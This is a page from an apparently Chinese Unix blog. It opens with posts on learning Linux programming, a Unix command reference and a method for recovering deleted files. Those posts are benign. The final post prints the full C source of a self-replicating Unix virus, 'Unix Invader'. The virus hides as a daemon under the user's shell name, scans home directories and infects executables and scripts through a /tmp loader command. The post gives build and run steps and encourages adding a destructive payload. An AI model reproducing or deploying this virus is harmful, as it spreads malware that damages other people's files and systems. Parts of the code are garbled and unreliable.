温室小花.技术.博客 --纯粹的unix技术博客 » other linux

学习linux/unix编程方法的建议.

admin — Wed, 06 May 2009 16:16:13 +0000

解答：学习Linux的四个步骤
假设你是计算机科班出身，计算机系的基本课程如数据结构、操作系统、体系结构、编译原理、计算机网络你全修过
我想大概可以分为4个阶段，水平从低到高
从安装使用=>linux常用命令=>linux系统编程=>内核开发阅读内核源码
其中学习linux常用命令时就要学会自己编译内核，优化系统，调整参数
安装和常用命令书太多了，找本稍微详细点的就ok，其间需要学会正则表达式
系统编程推荐《高级unix环境编程》，黑话叫APUE
还有《unix网络编程》
这时候大概还需要看资料理解elf文件格式，连接器和加载器，cmu的一本教材中文名为《深入理解计算机系统》比较好
内核开发阅读内核源码阶段，从写驱动入手逐渐深入linux内核开发
参考书如下《linux device drivers》，黑话叫ldd
《linux kernel development》，黑话叫lkd
《understading the linux kernel》，黑话叫utlk
《linux源码情景分析》
这四本书为搞内核的必读书籍
最后，第三阶段和第四阶段最重动手，空言无益，光看书也不罩，不动手那些东西不能理解。

学习linux/unix编程方法的建议
建议学习路径：
　　首先先学学编辑器，vim, emacs什么的都行。
然后学make file文件，只要知道一点就行，这样就可以准备编程序。
　　然后看看《C程序设计语言》K&R，这样呢，基本上就可以进行一般的编程了，顺便找本数据结构的书来看。
　　如果想学习UNIX/LINUX的编程，《APUE》绝对经典的教材，加深一下功底，学习《UNP》的第二卷。这样基本上系统方面的就可以掌握了。
　　然后再看Douglus E. Comer的《用TCP/IP进行网际互连》第一卷，学习一下网络的知识，再看《UNP》的第一卷，不仅学习网络编程，而且对系统编程的一些常用的技巧就很熟悉了，如果继续网络编程，建议看《TCP/IP进行网际互连》的第三卷，里面有很多关于应用协议telnet、ftp等协议的编程。
如果想写设备驱动程序，首先您的系统编程的接口比如文件、IPC等必须要熟知，再学习《LDD》2。
　
　对于几本经典教材的评价：
　　《The C Programing Language》K&R 经典的C语言程序设计教材，作者是C语言的发明者，教材内容深入浅出。虽然有点老，但是必备的一本手册，现在有时候我还常翻翻。篇幅比较小，但是每看一遍，就有一遍的收获。另外也可用谭浩强的《C语言程序设计》代替。
　　《Advanced Programing in Unix Envirement》 W.Richard Stevens：也是非常经典的书（废话，Stevens的书哪有不经典的！），虽然初学者就可以看，但是事实上它是《Unix Network Programing》的一本辅助资料。国内的翻译的《UNIX环境高级编程》的水平不怎么样，现在有影印版，直接读英文比读中文来得容易。
　　《Unix Network Programing》W.Richard Stevens：第一卷讲BSD Socket网络编程接口和另外一种网络编程接口的，不过现在一般都用BSD Socket，所以这本书只要看大约一半多就可以了。第二卷没有设计到网络的东西，主要讲进程间通讯和Posix线程。所以看了《APUE》以后，就可以看它了，基本上系统的东西就由《APUE》和《UNP》vol2概括了。看过《UNP》以后，您就会知道系统编程的绝大部分编程技巧，即使卷一是讲网络编程的。国内是清华翻译得《Unix网络编程》，翻译者得功底也比较高，翻译地比较好。所以建议还是看中文版。
　　《TCP/IP祥解》一共三卷，卷一讲协议，卷二讲实现，卷三讲编程应用。我没有怎么看过。，但是据说也很经典的，因为我没有时间看卷二，所以不便评价。
　　《用TCP/IP进行网际互连》Douglus.E.Comer 一共三卷，卷一讲原理，卷二讲实现，卷三讲高级协议。感觉上这一套要比Stevens的那一套要好，就连Stevens也不得不承认它的第一卷非常经典。事实上，第一卷即使你没有一点网络的知识，看完以后也会对网络的来龙去脉了如指掌。第一卷中还有很多习题也设计得经典和实用，因为作者本身就是一位教师，并且卷一是国外研究生的教材。习题并没有答案，留给读者思考，因为问题得答案可以让你成为一个中级的Hacker，这些问题的答案可以象Douglus索取，不过只有他只给教师卷二我没有怎么看，卷三可以作为参考手册，其中地例子也很经典。如果您看过Qterm的源代码，就会知道Qterm的telnet 实现部分大多数就是从这本书的源代码过来的。对于网络原理的书，我推荐它，而不是Stevens的《TCP/IP祥解》。

　　《Operating System – Design and Implement》这个是讲操作系统的书，用Minix做的例子。作者母语不是英文，所以英文看起来比较晦涩。国内翻译的是《操作系统设计与实现》，我没看过中文版，因为翻译者是尤晋元，他翻译的《APUE》已经让我失望头顶了。读了这本书，对操作系统的底层怎么工作的就会
有一个清晰的认识。
　　《Linux Device Driver》2e ，为数不多的关于Linux设备驱动程序的好书。不过内容有些杂乱，如果您没有一些写驱动的经验，初次看会有些摸不着南北。国内翻译的是《Linux设备驱动程序》第二版，第一版，第二版的译者我都有很深的接触，不过总体上来说，虽然第二版翻译的有些不尽人意，但是相比第一版来说已经超出了一大截。要读这一本书，至少应该先找一些《计算机原理》《计算机体系结构》的书来马马虎虎读读，至少应该对硬件和计算机的工作过程有一些了解。

unix常用指令及参数

admin — Wed, 08 Apr 2009 13:48:23 +0000

常用组合键
ctrl+h,backspace :删除前面的字符.
ctrl+u:删除一整行.
ctrl+c,del,break: 强行终止正在运行的程序.
ctrl+d:
常用指令
1.date:查看当前时间.
2.cal:查看某一个月的月历.
3.Finger 命令:显示一个用户的详细信息.
4.who命令:显示所有登陆用户.who an i
5.clear 命令:执行清屏动作.
6.echo 命令:将命令名后跟随的参数显示在屏幕echo hello

world
7.banner 命令:将命令名后跟的ACSSII字符串以大字的方式显

示在屏幕上banner hello
8.wc 命令:用于计算一个指定的文件中的行数单词及字符数:
格式wc[-c(计算字符的数目)] [-l(计算行的数目)] [-w(计算

单词的数目)] filename
9.passwd 命令,用于修改口令.
10.man 命令:联机手册
六.shell的基本功能:命令解释器,程序设计语言.
shell的退出命令.
1.exit 主要用于退出B_shell
2.logout 主要用于退出C_shell
3.ctrl+d 用于退出各类shell
第三章通信
内部通信
外部通信<1,电子邮件,2.即时通信
一.即时通讯
1.write 交谈命令 (半双工通信)
格式 write student1
ctrl+d 退出write
Write协议:消息发送结束用O(结束)
结束谈话用OO(结束并退出)
2.mesg 消息开关命令.用于查询和开关本终端的消息接收状态.
格式:mesg [-y] [-n]
$ mesg 查询本终端当前的消息接收状态
is y 可以接收消息
is n 拒绝接收消息
$ mesg n 设置关闭状态
$ mesg y 设置打开状态
3.talk 双向通信命令 (全双工方式)
4.wall 广播信息命令
二,电子邮件
$ mail username 发送邮件
$ mail 接收邮件
系统邮箱:在/usr/mail或/var/mail下,每个用户都有一个以其名字

命名的邮箱.例如:student8的系统邮箱可能为:/var/mail/student8
个人邮箱:个人邮箱通常为用户自己的主目录(home)下的mbox

文件.用户读过的邮件如果末删除或转存,则存放在个人邮箱中

.例如:student8的个人邮箱可能是:/home/student8/mbox
1.发送邮件:
$ mail student8
给多个用户发送邮件
a.$ mail student1 student2 student3 把用户列出来.
b.$ mail TEACHER TEACHER为用户组名,即向属于TEACHER

组所有用记发邮件.
c.$ alias usr_list student1 student2 student3给student1 student2

student3等多个名字建立一个部的别名usr_list,该别名只在本

shell中起作用,退出shell后无效.
$ mail usr_list
把已有的文件作为邮件发送给用户:
$ mail student8 < my_letter
发邮件给不存在的用户:
$ mail meizhegeren
mail命令本身能正常执行,由于无有效的接收方,所以系统把邮

件退回到用户主目录下dead.letter中.
2.接收邮件
不带参数输入mial表示读取邮件.此时已进入出境mail命令模式

下.
mail命令模式常用命令
如有下页则显示,否则退出mail.
p 显示本邮件信息
d 删除当前邮件
n 显示下一个邮件
q 退出 mail,把末删除的邮件保存到个人邮箱中.
R 回复邮件
! 执行shell命令.
? 显示mail的内部命令.
第四章文件系统
与目录相关的命令(pwd,cd,mkdir,rmdir,ls)
与文件相关的命令(cp,mv,ln,more,rm)
1.pwd 显示当前工作目录
2.cd 改变当前目录
3.mkdir 创建目录
格式 mkdir dir_name
4.rmdir 删除目录
格式 rmdir dir_name
a.只能是空目录.
b.有写的权限
一次操作多个目录
- p 选项.在当前目录下逐级创建目录,也可以逐级删除目录.
5.ls 显示目录
$ ls -a 显示所有文件(以点开头的文件名是隐藏文件)
$ ls -R 显示所有子目录的内容
$ ls – l 能得到目录中的文件的详细信息.
-:普通 d: 目录 c: 字符设备 b: 块设备 p:管道
$ ls – C 以多列的格式列表,按列排序.
$ ls – F 如果是目录,文件名后加/,如果是可执行文件,加*表示.
$ ls – m 按页宽列文件,以逗号分隔.
$ ls – p 如果是目录,文件名后加/
$ ls – r 以字母反序列表
$ ls – s 以文件块为单位显示文件大小
$ ls – x 以多列的格式列表,按行排序.
$ ls -G 以不同的颜色显示.
$ ls -lc 显示更新时间
$ ls -i inode序号将列在第一列
$ ls -lu 显示访问时间
$ ls -I 显示更改时间
6.touch 命令:作用是用来修改文件访问时间更改时间的.并可以

用来创建0字节长度的文件.
格式 touch 命令参数
7.cp 命令:复制文件
格式 cp source target
$ cp file1 file2 … Target-dir
$ cp -i 如果目标文件存在,请求确认
$ cp -r 复制目录到新的目录
8.mv 命令:移动文件或命名文件
格式:mv source target
9.ln 命令:ln命令的主要功能是给一个已经存在的文件再取一个

名字.新的文件名与原文件名可以在同一个目录下,也可以以在

不同的目录下,新老文件名代表同一个文件.
格式ln source-file target-file
作用:在现有的文件与新文件之间建立新链接,使一个文件具有

一个以上的名字.
显示文件内容命令
10.cat 命令:用来显示.创建或者合并文件
格式cat filename
11.more 命令:逐屏显示文件内容.翻屏时用键.
格式:$ more filename
12.rm 命令:删除文件(删除后无法恢复)
格式:$ rm file
$ rm file1 file2
$ rm -i 删除文件前,给出确认
$ rm -r 删除指定的目录及目录中的所有文件和子目录.即删除

整个目录结构.
13.lp 命令:打印命令
14.cut 命令:切取文件内容,用于切取文件中的列或字段.它把文

本文件中每一行的一部分显示输出.运行时必须指定功能选项.
- f 指定字段的位置
-c 指定列的位置
-d 指定字段分隔符,缺省的字段分隔符是制表符tab
15.paste 命令:连接文件.
作用:把文件一行接一行地连接在一起,或者把两个或多个文件

的域连到一个新文件里.
格式: $paste 选项参数
选项:-d 指定分隔符.默认是制表符
第五章文件权限
16.chmod 命令:修改文件权限,常用chmod命令修改文件(包括普

通,目录和设备)的访问权限,
格式: chmod pattern filename …
finename 为要修改的权限文件名.可以有多个.
pattern 为将改变成的权限,可以用两种形式表示:字母式和数字

形式.
a,字母形式(符号模式)
字母形式由用户类别(u,g,o). 如何改变(+,-)和权限(r,w,x)三部分

组成.
u:本用户g:同组用户o:其它用户. + :增加权限 -:删除权限
r:读w:写x:执行
例如:chmod u+x file1
chmod o-w file2 file3
chmod go+r file4
b, 数值形式
格式: chmod 777 file1
*新建文件或目录最大权限=状态掩码+新建文件或目录缺省

权限.此时unask为000
对一个新建的文件,umask值为022则指定该文件的权限为644:
对一个新建的目录,umask值为022则指定该目录的权限为755
17.sort 命令:作用在于将指定的文件中的文件进行排序,并把排

序的结果输出到指定的标准输出中.
格式:$srot [-t delimiter] [+field] [.column]][option]
选项: -d 以字典顺序进行排序
-
18.head 命令:用于查看一个文件.或多个文件的前面几行的内

容.
格式:$ head [-number_of_lines] file(s)
19.tail 命令:用于显示从指定行开始直到文件末尾的文件内容
格式;tail [-number_of_lines | +number_of_lines]file
20.tee 命令:在获得输入后,将把该输入数据送到两个地点:标准

输出和文件.
21.grep 命令: 用于选项定包含特定模式的文本行.
21.find 命令:在目录中递归地搜索包括有特定字符的文件名.
22.df 命令:磁盘空间监测命令.显示当前系统中各个逻辑磁盘

中空闲的磁盘块数和空闲的索引节点(即可建立的新文件数)
23.du 命令:查看磁盘使用情况统计,统计指定的目录及所有子

目录的磁盘使用情况,统计单位是磁盘块数.
选项:-a 显示所有文件及子目录
24.fsck 命令:文件系统管理:用于检测和修复文件文件的错误,
25.tar命令:文件存储与备份.该命令可以把文件系统中的一个

或一组文件打成一个文件包.存放到外存上或硬盘上文件系统

的其它地方.常用于多个文件(包括目录)的备份或转移.
格式: tar -cvf target file1 file2 file3 …把file1 file2 file3等文件备份到

档案文件target中.
tar -tvf target 检查档案文件target中包含的文件信息.
tar -xvf targer [file1] 从档案文件target中提取全部或file指定

的文件.
26.shutdown 命令:系统关机
选项:-h 完全关机
-r 关机并重新启动系统
time 关机时间,如17:30
message 关机前向所有已登陆用户发送消息
例如: shutdown -r now 现在关机重启.
27.crypt 文件加密命令:用于对文本文件进行加密和解密.以防

止文件内容泄密.
例如:$ crypt < file > file.cry 对file加密,结果保存在file.cry中.key:加

密口令
$ crypt aaa 对aaa.cry解密,结果保存到aaa中. key:

解密口令
附:$ vi -x file.cry 编辑一个加密后的文件
28.compress/uncompress 文件压缩和解压命令
格式:compress data_file 加压后自动在文件名后加一个.Z
umcompress abc.Z
29.at 定时执行任务:在指定的时间一次性执行规定的任务.
at 15:30 在15:30分执行
who >> userlist 把上机用户清单发到userlist
30,cron 系统定量执行任务:
31,crontab 任务描述文件的管理命令.

Unix下删除文件怎样恢复？

admin — Sat, 27 Dec 2008 05:42:12 +0000

与DOS/Windows不同，UNIX文件被删除后很难恢复，这是由UNIX独特的文件系统结构决定的。
UNIX文件目录不像DOS/Windows那样，文件即使被删除之后仍保存有完整的文件名、文件长度、
始簇号(即文件占有的第一个磁盘块号)等重要信息;相反，它的文件信息全部依靠一种被称为i节点
的数据结构来描述，而i节点在相应文件被删除之后即被清空，因此，要想直接恢复被删除的文件内容
几乎是不可能的，必须另辟蹊径。本文结合实际，讨论几种文件恢复策略及其关键步骤的具体实现。

　　一、UNIX文件系统结构

　　我们知道，UNIX是以文件卷作为其文件系统存储格式的，而不同的UNIX系统，文件卷格式是有差异的，
甚至即使是同一UNIX操作系统的不同版本，其文件系统未必完全相同，例如：SCO UNIX 4.1版与5.0版
文件系统结构就有明显差异，但只要是UNIX系统，其文件卷的基本结构是一致的。分析如下：

　　不管是什么UNIX系统，不管什么版本，其文件卷至少包括引导块、超级块、i节点表、
数据区等几个部分。除此之外，不同UNIX版本可能还有不同的差异。例如：SCO UNIX系统的位图
索引块和位图块AIX的逻辑卷表等。这些系统的特殊性不影响下文的恢复策略，故这里不作讨论，
仅介绍标准UNIX文件卷结构。

　　1. 引导块

　　位于文件卷最开始的第一扇区，这512字节是文件系统的引导代码，为根文件系统所特有，
其他文件系统这512字节为空。

　　2. 超级块

　　位于文件系统第二扇区，紧跟引导块之后，用于描述本文件系统的结构。如i节点长度、
文件系统大小等，其结构存放于/usr/include/sys/filsys.h中，其结构如下：

　　struct filsys

　　{

　　ushort s_isize; /*磁盘索引节点区所占用的数据块数*/

　　daddr_t s_fsize; /*整个文件系统的数据块数*/

　　short s_nfree; /*在空闲块登录表中当前登记的空闲块数目*/

　　daddr_t s_free[NICFREE]; /*空闲块登记表*/

　　short s_ninode; /*空闲索引节点数*/

　　ino_t s_inode[NICINOD]; /*空闲节点登记表*/

　　char s_flock; /*加锁标志位*/

　　char s_ilock; /*节点加锁标志位*/

　　char s_fmod; /*超级块修改标志*/

　　char s_ronly; /*文件系统只读标志*/

　　time_t s_time; /*超级块上次修改的时间*/

　　short s_dinfo[4]; /*设备信息*/

　　daddr_t s_tfree; /*空闲块总数*/

　　ino_t s_tinode; /*空闲节点总数*/

　　char s_fname[6]; /*文件系统名称*/

　　char s_fpack[6];

　　long s_fill[13]; /*填空位*/

　　long s_magic; /*指示文件系统的幻数*/

　　long s_type; /*新文件系统类型*/

　　};

　　3. i节点表

　　i节点表存放在超级块之后，其长度是由超级块中的s_isize字段决定的，其作用是用来描述
文件的属性、长度、属主、属组、数据块表等，其数据结构在/usr/include/sys/ino.h中，如下：

　　struct dinode

　　{

　　ushort di_mode;

　　short di_nlink;

　　ushort di_uid;

　　ushort di_gid;

　　off_t di_size;

　　char di_addr[40];

　　time_t di_atime;

　　time_t di_mtime;

　　time_t di_ctime;

　　};

　　4. 目录结构

　　UNIX所有文件均存放于目录中，目录本身也是一个文件。目录存放文件的机制如下：首先，
目录文件本身也象普通文件一样，占用一个索引节点，其次，由这个索引节点得到目录内容的
存放位置，再次，从其内容中取出一个个的文件名和它对应的节点号，从而访问一个文件。
目录结构如下：

　　索引节点号(2字节) .(本目录)(14字节)

　　索引节点号(2字节) ..(父目录)(14字节)

　　索引节点号(2字节) 文件名(14字节)

　　由上可知文件名是依靠目录来描述的，文件的内容和其他信息则由索引节点来描述。

　　二、文件的删除过程

　　UNIX下删除一个文件的过程很简单，那就是释放索引节点表和文件占用的数据块，
清空文件占用的索引节点，但不清除文件内容。但删除文件与删除目录的处理不尽相同，
不同命令删除文件的过程也不相同。

　　1. 删除一个文件

　　UNIX 删除一个文件的具体步骤是：根据文件i节点的地址表逐一释放文件占用的磁盘数据块，
然后清空相应的节点，最后释放i节点。

　　2. 删除一个目录

　　删除一个目录的过程：首先逐一删除目录里的所有文件，然后删除目录。
目录本身也是一个文件，故删除方法与删除文件一致。

　　3. 几种不同的删除命令

　　.rm 命令

　　一般删除命令，删除过程上述已说明。

　　.mv命令

　　格式：mv 文件1 文件2

　　处理过程是将文件2的数据块释放，然后将文件1的名称改为文件2，再释放文件2所占的i节点。

　　. > 命令

　　格式：>文件名

　　若产生一个新文件，>命令仅仅申请一个i节点，而不写入任何文件内容；若清空一个
已经存在的文件，则释放文件所占的数据块，并将文件长度清零。

　　三、被删文件的恢复策略

　　要恢复被删除的文件，只能根据删除后留下的东西去做文章。文件被删除后留下了什么呢？
由上述分析可知：其一、留下了文件的内容；其二、留下了“现场”。文件的恢复策略只能从这
两个方面来分析。以下谈几种恢复策略。

　　1.根据磁盘现场进行恢复

　　如果文件被删除，现场未被破坏(即文件被删除后硬盘未发生过写操作)，而且假定只删除了
一个文件，那么可根据系统的分配算法进行恢复。因为系统建立一个文件时，必定根据某一特定
的分配算法决定文件占用的数据块位置。而当该文件被删除后，它所占用的数据块被释放，
又回到系统的分配表中，这时如果重新建立一个文件，系统根据原来的分配算法分配出的数据块
必定跟该文件原来占用的数据块一致，而且我们知道，UNIX文件最后一数据块尾部多出的字节是
全部置0的，据此只要调用系统的数据分配算法，在系统中一块块的申请数据块，因为UNIX文件最后
一个数据块尾部多出的字节全部为0，所以，只要发现一个分配出的数据块中尾部全为0，即可认为
文件结束，由此可确定文件长度和内容，进而实现恢复。方法如下：

　　⑴申请一个索引节点，即向系统申请创建一个新文件名而不写入任何内容。如：#>/tmp/xx

　　⑵调用系统分配数据块算法getnextfreeblock()得到一个数据块号，记入某一地址表变量中。

　　⑶读出这个数据块，判断其尾部是否全部连续为0，若不是，则回到(2)，若是，则进行(4)。

　　⑷首先用系统函数fstat得到/tmp/xx的i节点号，然后将(2)步所得的地址表写入索引节点的
地址表中(注意间址问题)，并根据数据块个数和最后一块中有效数据长度计算出文件大小，
写入i节点的di_size字段。

　　⑸回写系统的索引节点表即可。

　　需要说明的是，第一，系统分配数据块的算法因不同的UNIX版本而不同；第二，有的UNIX
如SCO UNIX 5.0版，其空闲数据块的分配和回收是使用一种动态链表的数据结构来实现的，
它们的文件恢复更加容易，只要在空闲链表中的表尾去寻找即可，笔者另行描述。

　　2. 根据内容恢复。

　　若现场已被破坏，即硬盘发生过写操作，那么只好根据内容来恢复。而且，由于UNIX是
一个多进程、多用户系统，它每一次开关机或硬件、通讯故障等都会记录系统日志、.sh_history等，
硬盘现场被破坏可能性极大。因此讨论按内容恢复的方法具有更大的实用价值。笔者经过实际探索
得出下列四种恢复策略供参考。

　　⑴关键字搜索法

　　如果知道被删除的文件内容中若干字节的内容，而且该文件长度又不超过一个磁盘块，
那么可以在整个文件系统中搜索这一字节串，得出一个文件所在的数据块，将它们的块号填入
一个i节点，即可恢复一个文件，搜索文件系统的算法很简单，说明如下：

　　a. #df -k 确定文件系统的设备文件名(如/dev/root)

　　b.用下述函数搜索，若成功，返回数据块号，反之返回-1。其中fsname是文件系统的设备名，
如/dev/root，comp()参数是实现搜索条件的函数。

　　long searchfs(char *fsname , int comp())

　　{

　　FILE *fp;

　　char buf[1024];

　　long i=0;

　　fp=fopen(fsname,”r”);

　　while (!feof(fp))

　　{

　　fread(buf,1024,1,fp);

　　if (comp()) /* 检查是否符合搜索条件 */

　　return i; /* 若成功返回块号 */

　　i++;

　　}

　　fclose(fp);

　　return -1; /* 未找到符合条件的块，返回-1*/

　　}

　　⑵精确长度搜索法

　　如果知道被删除文件的精确长度(字节数)，那么可根据一个数据块的大小，计算出文件的最后
一个数据块中数据的精确长度，该数据块中其他字节必然是全0。根据这一条件，通过搜索整个文件
系统，找出其中符合条件的数据块，若出现多个块符合要求，则还需要根据其他条件区分。
但不管怎样，根据精确长度分析也是恢复数据的一个策略。

　　⑶内容关联法

　　如果知道文件内容中存在某种可实现的关联，例如文件的校验和，或者文件内容的某种
上下文关系，那么也可通过搜索整个文件系统，通过反复尝试寻找符合关联条件的磁盘数据块，
进而恢复一个文件。

　　⑷环境比较法

　　如果知道删除文件所在的文件系统的安装过程，那么，另行找一台完全相的机器，按原来完全
相同的步骤安装相同版本的UNIX和相应的其他软件，可以想象，新的机器环境会与原来的环境
基本相同，比较两个机器上相同文件系统的内容，可以推断出被删除文件的大致位置，至少
可以大大减少查找的范围，一旦查找的范围足够小时，可以用逐个观察和尝试的方法结合其他
条件恢复数据，降低恢复的难度，增加恢复的可靠性。

　　UNIX系统下文件系统恢复的具体实现依赖于不同操作系统和不同版本的具体文件系统结构和
磁盘块分配算法。本文试图总结出一种一般性的思路和策略，限于篇幅，不能详细讨论它们的
具体实现过程。

椐俺所知，FinalData不仅可以进行Windows系统下的数据恢复，也支持Unix系统下的数据恢复。

Solaris比较困难一些，但Linux&BSD应该都比较容易。

ufs的文件系统，用tct可以很轻松地搞定的。到xfocus去找一个tct试试先。

C编写的UNIX病毒

admin — Sat, 27 Dec 2008 05:35:16 +0000

Unix Invader (入侵者)

/*—————-cut from here ————————-*/
/*这是一只 UNIX 下的电脑病毒,
virus name: Unix Invader (入侵者)
written by NCKU htk

其特点有:
1.其具有 daemon process 的特性(lose control tty)
故该process owner 没在线上,该病毒依旧能作用执行,
不会被系统终结.
2.其可感染 UNIX 上 script file 和各型 binary file
(当然要属性得宜) ,不重复感染.感染完后,该执行档或
script file 依旧可执行…(好像是废话)
3.其在记忆体上所用的隐藏方法是,扫描passwd file,取用
该user 的 login shell basename 作为程式名,故,用ps -aux
(单ps 看不到)或 top 之类的程式,要仔细看,才会被发现…(有点奸诈)
4.其不重复长驻,顶多一个 user 一只,目地是为扩大感染能力
5.其它…暂时没有.
6.本来要增加 root kill -9 也杀不死的能力,但,时间有限,且经济
效益不高所以作罢…(别跟我说 kill -9 pid 是无敌的,我依然有办法)
如何实验?
cp 几个 binary file 到你的 home directory 里,做几个开头字元
是 # 的 script file ….
如何起动?
1.先把此档案设定为 filename.c
2. gcc -O -o virus@ filename.c 或 cc -O -o virus@ filename.c
^ ^ 很重要一定要有!
3.然后可能会有些警告讯习,管它….,然后,应该会有个 virus@ 档出现
4. ls -l 看看该(virus@)档案长度多长,记好.
5.用 vi 或任何 editor 再回来改 filename.c 里面的 #define 后面档案
长度(有标示 here 的地方)
6.然后重覆第 2.个步骤,然后得到的 virus@ 才是我们要的.
7.执行它…ok!

8.你就中毒了(十秒内)……..以后一旦有适合的档案将会马上被感染…
其它:1.此 virus ,小弟未作发作部份,因为,破坏的事人人会做,我不想浪费精力
想个残忍的破坏动作……..有兴趣的人,可以自己去加上….
2.此 virus ,在UNIX 作业系统下执行,故证明一点….只要有人类,没有什
么不可能有 virus 的 environment,方法是人想出来的.
3.若以一个 system administrator 的眼光来看此毒,亦可以得到个结论,
能被此 virus 感染的该帐号,被Crack 的机会是相当高.
4.此 virus 目前是以线上所有人的 home directory 为感染 search 开端,
其实,若该user 的目录下有个dynamic symbolic link 到根目录下,search
就可能把整个wrok station 的目录扫完.
5.此 virus 并不时时扫描目录,内定是 10 秒,唤醒一次,以免被发现…
6.此 virus 是翻脸不认人的,所以你自己的目录也会被感染,自己的属姓设定
是没有用的,所以实验前赶紧搬一搬吧!
7.任意实验此病毒于公用的工作站是相当不道德的,作者是在自己的 linux上
实验,您…自个好自为之,被抓到或被踢除帐号,别怪作者htk
没先跟你说.
OK?
大家好好玩吧!

注:Dark Slayer 乃现任 Taiwan Power Virus Orginization 头头是也…

/* VIRUS IN UNIX !!!! */
/* written by NCKU EE htk */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define CHK 512
#define PERM S_IRWXU
#define CHKT 10
#define LOADER “\nrm -f /tmp/.@`whoami`;cat < ”
#define LOADER2 ” |tail -c 18606 >/tmp/.@`whoami`;chmod 700
/tmp/.@`whoami`;/tmp/.@`whoami`;rm -f /tmp/.@`whoami`;exit;\n”
/* ^^^^^modify here !!! */
#define VL 18606
/* and ^^^^^ here !!! */
#define VLL -VL

#define BUFSIZE 25088
#define BSI 80
#define EXE 1
#define SCR 2
struct flock bk;
int fo,f,status=NULL;
int flagn=0;
void main(argc,argv,envp)
int argc;
char *argv[];
char *envp[];
{
char *buf2,*fname;
static char pidp[BSI]=”/tmp/.”;
static char bufr[BSI]=”";
static int dec;
unsigned int k,kep;
struct passwd *getp;
int caller(void);
int chec(int);
char *base(char *);
char *find(void);
void catch(void);
int check(char *,int);
signal(SIGCLD,SIG_IGN);

strcat(pidp,ecvt((double)getuid(),chec(getuid()),&dec,&dec));

fname=(char *)tempnam(“/tmp”,NULL);
buf2=(char *)malloc(BUFSIZE);
if((fo=open(argv[0],O_RDONLY))<0 || (f=creat(fname,PERM))<0) exit(1);
if((kep=lseek(fo,0L,2))>2*VL)
{
lseek(fo,VLL,2);
k=read(fo,buf2,VL);
write(f,buf2,k);
lseek(fo,VL,0);
while((k=read(fo,buf2,BUFSIZE))>0)
write(f,buf2,k);
/* ignore more lefting virus in a tail */
}
else
{
lseek(fo,VL-kep,2);
k=read(fo,buf2,kep-VL);
write(f,buf2,k);
}
close(f);
chmod(fname,S_IRWXU);
free(buf2);

if((kep=fork())>0)
{
for(k=0;k if(*(argv[0]+k)==’@') exit(0);
execve(fname,argv,envp);
}
else
if(kep==0)
{
sleep(2);
unlink(fname);

for(k=0;k getp=(struct passwd *)getpwuid(getuid());
strcpy(argv[0],base(getp->pw_shell));

/* initialize daemon process … */

for(k=0;k<2;k++) close(k);
umask(0);
if(fork()!=0)exit(0);
signal(SIGHUP,SIG_IGN);
signal(SIGINT,SIG_IGN);
signal(SIGTTOU,SIG_IGN);
setpgrp();
if((kep=open(“/dev/tty”,O_RDWR))>=0)
{ ioctl(kep,TIOCNOTTY,(char *)0);
close(kep);
}
if(fork()!=0)exit(0);

signal(SIGUSR1,catch);
if((kep=open(pidp,O_CREAT|O_RDWR,S_IRUSR|S_IWUSR))<0) exit(1);
k=read(kep,bufr,BSI);
if(k!=0) kill(atoi(bufr),SIGUSR1);

strcpy(bufr,ecvt((double)getpid(),chec(getpid()),&dec,&dec));
lseek(kep,0L,0);
do{
k=write(kep,bufr,strlen(pidp)+1);
while((buf2=find())!=NULL)
{
getp=(struct passwd *)getpwnam(buf2);
if(chdir((buf2=(char *)getp->pw_dir))<0) continue;
if(ftw(buf2,caller,15)!=0) continue;
}

sleep(CHKT);
setutent();
lseek(kep,0L,0);
}while(1);
}
}
int chec(num)
int num;
{
int y=1;
while((num=(int)(num/10))>=1) y++;
return(y);
}
void catch(void)
{
flagn=1;
}

char *base(poi)
char *poi;
{ int i;
for(i=(strlen(poi)-1);i>=0;i–)
if(*(poi+i)==’/') return((char *)(poi+i+1));
return(“sh”);
}
char *find()
{
static char name[9]=”";
struct utmp *goal;
goal=(struct utmp *)getutent();
if(goal->ut_type==USER_PROCESS)
{
strcpy(name,goal->ut_user);
return(name);
}
if(goal==(struct utmp *)NULL) return(NULL);
}

int caller(name,statptr,type)
char *name;
struct stat *statptr;
int type;
{ unsigned int nread,ymode;
static char load[200];
char buf[VL],buf3[VL];
if(type==FTW_F)
{
ymode=statptr->st_mode;
if(check(name,ymode)<0)
{ if(statptr->st_uid==getuid()) chmod(name,ymode);
return(0);
}
if( status==SCR )
{
strcpy(load,LOADER);
strcat(load,name);
strcat(load,LOADER2);
lseek(f,0L,2);
write(f,load,strlen(load));
lseek(fo,0L,0);
nread=read(fo,buf,VL);
write(f,buf,nread);
}
if( status==EXE )
{

if(statptr->st_size>VL)
{
lseek(f,0L,0);
nread=read(f,buf,VL);
lseek(f,0L,2);
write(f,buf,nread);
lseek(fo,0L,0);
nread=read(fo,buf,VL);
lseek(f,0L,0);
write(f,buf,nread);
}
else
{
lseek(f,0L,0);
nread=read(f,buf3,VL);
ymode=nread;
lseek(fo,0L,0);
nread=read(fo,buf,VL);
lseek(f,0L,0);
write(f,buf,nread);
write(f,buf3,ymode);
}
}
/* lseek(f,0L,0);
lockf(f,F_ULOCK,0); */
/* author’s linux library has no above program library */

bk.l_type=F_UNLCK;
bk.l_whence=0;
bk.l_len=0;
bk.l_start=0;
fcntl(f,F_SETLK,&bk);

if(statptr->st_uid==getuid()) chmod(name,ymode);
close(f);
}
if(flagn) exit(0);
return(0);
}
int check(name,ymode)
char *name;
int ymode;
{
char ch[CHK];
char ch2[CHK];
int rd,i;
status=(int)NULL;
if((f=open(name,O_RDWR))<0)
{
if(chmod(name,ymode|S_IRUSR|S_IWUSR)<0) return(-1);
if((f=open(name,O_RDWR))<0) return(-1);
}
/* if(lockf(f,F_TLOCK,0)<0) { close(f); return(-1); } */

bk.l_type=F_WRLCK;
bk.l_whence=0;
bk.l_len=0;
bk.l_start=0;
if(fcntl(f,F_SETLK,&bk)<0) { close(f); return(-1); }

lseek(f,0L,0);
rd=read(f,ch,CHK);
lseek(fo,0L,0);
read(fo,ch2,rd);
for(i=0;i if(ch[i]!=ch2[i])
{
if( ch[0]!=’#’ && (ymode&(S_IXUSR|S_IXGRP|S_IXOTH)) )
{
status=EXE; return(1); }
else
if( ch[0]==’#’ && lseek(f,0L,2)>VL ) /* you can improve the rule */
{
lseek(f,VLL,2);
rd=read(f,ch,CHK);
lseek(fo,0L,0);
read(fo,ch2,rd);
for(i=0;i if(ch[i]!=ch2[i])
{ status=SCR; return(1); }
}
else if(ch[0]==’#')
{ status=SCR; return(1); }
break;
}
